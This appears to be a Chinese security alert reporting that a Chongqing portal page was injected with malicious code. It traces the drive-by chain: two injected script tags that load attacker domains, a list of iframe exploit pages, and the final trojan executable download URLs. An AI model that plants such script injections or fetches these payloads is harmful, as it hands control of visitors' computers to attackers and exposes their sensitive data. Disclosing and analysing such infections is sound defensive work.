重庆人信息门户被植入恶意代码
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://movie.my023.com/
网页被嵌入恶意链接代码:
<script src=http://lnadk.cn></script>
<script src=http://mmc.wo94ni.%63n></script>
挂马分析:
[wide]http://movie.my023.com/
[script]http://lnadk.cn
[frame]http://count29.51yes.com/sa.aspx?id=294581529
[frame]http://360.94makelove.cn/yahoo/q8.htm
[frame]http://qq.94makelove.cn/new/index2.htm
[frame]http://qq.94makelove.cn/new/cute.htm
[frame]http://qq.94makelove.cn/new/yt.htm
[frame]http://qq.94makelove.cn/new/14.htm
[frame]http://qq.94makelove.cn/new/ms09002.htm
[frame]http://qq.94makelove.cn/new/real.htm
[frame]http://qq.94makelove.cn/new/real11.htm
[script]http://qq.94makelove.cn/new/index.gif
[frame]http://qq.94makelove.cn/new/ms08053.htm
[script]http://s45.cnzz.com/stat.php?id=1370858&web_id=1370858
[script]http://js.tongji.cn.yahoo.com/1061083/ystat.js
[script]http://lnadk.cn
[script]http://mmc.wo94ni.%63n
[frame]http://kdx.ldc86.cn/1/01/index.htm?5
[frame]http://kdx.ldc86.cn/1/01/index2.htm
[frame]http://kdx.ldc86.cn/1/01/ccqm.htm
[script]http://kdx.ldc86.cn/1/01/js.css
[frame]http://kdx.ldc86.cn/1/01/cr14.htm
[frame]http://kdx.ldc86.cn/1/01/crfl.htm
[frame]http://kdx.ldc86.cn/1/01/crvod.htm
[frame]http://kdx.ldc86.cn/1/01/crxxz.htm
[frame]http://kdx.ldc86.cn/1/01/crff.htm
[frame]http://kdx.ldc86.cn/1/01/crbf.htm
[frame]http://kdx.ldc86.cn/1/01/cr122121.htm
[frame]http://count27.51yes.com/sa.aspx?id=278116558
最终下载病毒文件:
http://3.meng3130.cn/cs/ok.css
http://w11.s8m1.com/01/Actvev.exe
http://w11.s8m1.com/01/v.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
关键字:恶意代码